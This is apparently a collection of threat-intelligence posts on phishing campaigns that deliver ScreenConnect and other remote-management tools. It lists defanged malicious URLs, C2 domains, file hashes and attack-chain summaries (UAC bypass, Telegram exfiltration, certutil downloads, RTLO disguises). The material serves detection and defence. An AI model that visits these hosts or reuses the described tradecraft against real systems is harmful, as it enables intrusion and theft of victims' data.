⚠️Observed phishing URLs delivering RMM payload: RMM: ScreenConnect Theme: DocuSIgn URL: hxxps://docsonlineshare.shorepowersolution[.]net/docusign/d0cs/ MSI Download URL: hxxps://docsonlineshare.shorepowersolution[.]net/docusign/d0cs/Windows/download/index.php SHA256: 160c4e5bd3f09c53a09e5fc95c34cf9fc2e96525e72412645350ba27a7025b34 #ThreatIntel #Phishing #RMM

New analysis reveals Rock, a single developer operating The Quarry MaaS/PhaaS ecosystem since April 2025, enabling up to 200 affiliates to run tax-themed phishing campaigns targeting US 🇺🇸 organizations with legitimate RMM tools. Key technical details: • Modular toolkit includes VBS droppers with UAC bypass, self-hosted ScreenConnect panels, Rocky Gmail Sender mass mailer, and PowerShell exfiltration scripts • Three VBS variants: Base64, hex-encoded GitLab loader, PowerShell AES decryption to evade static analysis • Legitimate signed RMM software (ScreenConnect, Tiflux, Datto) used as final payload, not modified malware • Adspect cloaking filters researchers while serving fake SSA/IRS portals to victims • Telegram-based C2 for real-time victim logging and exfiltration (T1071.001) Attack chain methodology: • Bulk emails with tax lures → Adspect filtering → spoofed government portals → RMM payload delivery via de.php • VBS path: self-elevation → parallel RMM decoy PDF download → silent install with /quiet ALLUSERS=2 → cleanup • Post-exploitation includes browser history theft and W-2 document finder targeting financial data 90% victims in US 🇺🇸 across SaaS (17.4%), Healthcare (15.8%), Media (14.7%), Finance (11.1%) sectors. Arabic comments in code suggest developer origin, but affiliates span multiple regions. #DFIR_Radar

⚠️Observed phishing URLs delivering RMM payload: RMM: ScreenConnect Theme: DocuSign URL: hxxps://muunpolicy[.]com File Download URL: hxxps://github[.]com/lonergigs-code/DocuSign/releases/download/V1.9.1/DocusignSetup.exe C2 domain: rbbytati25iy2.anondns[.]net:8041 SHA256: 60f104030a7e6fc47d5ce7c286c5172e9f835a09b5a560350ac71d0c25f8c187 File Signer: "Paula Foster" More domains - pastebin.com/Baf7XHtL #ThreatIntel #Phishing #RMM

An operator conducted a five‑day, SSA-themed phishing intrusion using AdaptixC2 with XWorm and dual ScreenConnect clients for persistence and control, exfiltrating via Telegram and targeting a large Active Directory network. blog.deception.pro/blog/xwor…

Microsoft exposes a cryptojacking campaign using SEO poisoning and ScreenConnect to target high-performance PCs, with malicious sites also surfaced through AI chatbots. The post From poisoned search results to GPU minin... f.mtr.cool/njgcgjxhtw

again screenconnect

#threatreport #HighCompleteness [Op Report] From SSA Phish to AdaptixC2: A Multi-RAT Intrusion | 11-06-2026 Source: blog.deception.pro/blog/xwor… Key details below ↓ 💀Threats: Adaptixc2_tool, Xworm_rat, Screenconnect_tool, Right-to-left_override_technique, Typosquatting_technique, Phantom_stealer, Pingcastle_tool, Mimikatz_tool, Tinba, Spear-phishing_technique, Credential_dumping_technique, 🎯Victims: Healthcare 🏭Industry: Healthcare 🌐Geo: United states, Polish 📚TTPs: ⚔️Tactics: 3 🛠️Technics: 9 🧨IOCs: - Domain: 9 - File: 15 - IP: 3 - Url: 10 - Hash: 5 - Path: 3 - Registry: 2 - Command: 2 💽Software: WordPress, Active Directory, Telegram, Windows Powershell 🔢Algorithms: sha256, zip 🔠Functions: RPC 📜Programming Languages: php, powershell 💻Platforms: x86 #threatreport: In mid-May 2026, a sophisticated commodity intrusion was executed using a multi-layered approach involving malware and remote access tools within a Microsoft Active Directory environment in the healthcare sector. The attack process began with a well-crafted phishing email impersonating the Social Security Administration (SSA), which included a link to a RAR archive hosted on a compromised WordPress site. This archive contained a PE32 executable disguised as a PDF using a right-to-left override (RTLO) filename trick, allowing it to evade detection. The attacker used AdaptixC2 as the primary command-and-control (C2) infrastructure, employing additional tools such as XWorm for redundant access and Telegram for exfiltration, alongside two independent instances of ScreenConnect for interactive control. Initial compromise involved the phishing email leading to the delivery of a malicious DLL (jli.dll), which was dropped in the user’s public documents. The operator subsequently used the Windows certutil command to download AdaptixC2 components from a specified URL, facilitating the establishment of persistence and further payloads. Over the engagement, multiple Staging variants of AdaptixC2 were launched, exhibiting beaconing behavior to specific IP addresses through HTTPS. Utilizing TLS inspection provided insights into the C2 traffic, revealing the actual URLs and beacons in plaintext, contributing to effective attribution of the activity. The reconnaissance phase involved mapping out the domain using SAMR and LSAD, allowing the attacker to gather detailed information about domain users, groups, and trust relationships, crucial for lateral movement. The primary C2 framework, AdaptixC2, exhibited a distinctive beaconing pattern characterized by specific HTTP POST requests to endpoints such as /updates/check.php. XWorm, deployed as a DLL, provided additional access capabilities and utilized Telegram’s Bot API for exfiltration, indicating a well-defined operational methodology. Meanwhile, ScreenConnect offered interactive access with resilience through deployment across multiple domains, complicating attempts to sever attacker access. Given the complexity of the attack, it reflects an adaptive intrusion strategy where initial access relies on social engineering rather than advanced technical exploits. The use of RTLO to disguise executables remains a reliable tactic to bypass user vigilance, while the presence of non-detectable hashes for the payload in VirusTotal emphasizes the need for behavioral detection and network monitoring rather than reliance on conventional file hash fingerprints. This case underscores the importance of vigilant monitoring for legitimate tools being exploited as part of malicious campaigns, particularly focusing on certificate utilities, persistence mechanisms, and C2 behavior linked to known malware families.

⚠️Observed phishing URLs delivering RMM payload: RMM: ScreenConnect Theme: DocuSign URL: hxxps://regulatory-review[.]com File Download URL: hxxps://store-eu-par-5.gofile[.]io/download/direct/ec98a359-3803-4da2-b8c8-b6479c7e45b5 C2 domain: hitpanel[.]top:8041 SHA256: 24bc3936ae9054ab66ace68d6b23ca3e8853ebb7239c32651d36c93459d51793 File Signer: "Palacios Edgar" #ThreatIntel #Phishing #RMM

ScreenConnect virus, B.E.C, Office365, C.T.W

#XWorm #AdaptixC2 #ScreenConnect I have been working with @malbeacon and the deception.pro platform. Here's a write up of a recent deception operation👇 blog.deception.pro/blog/xwor…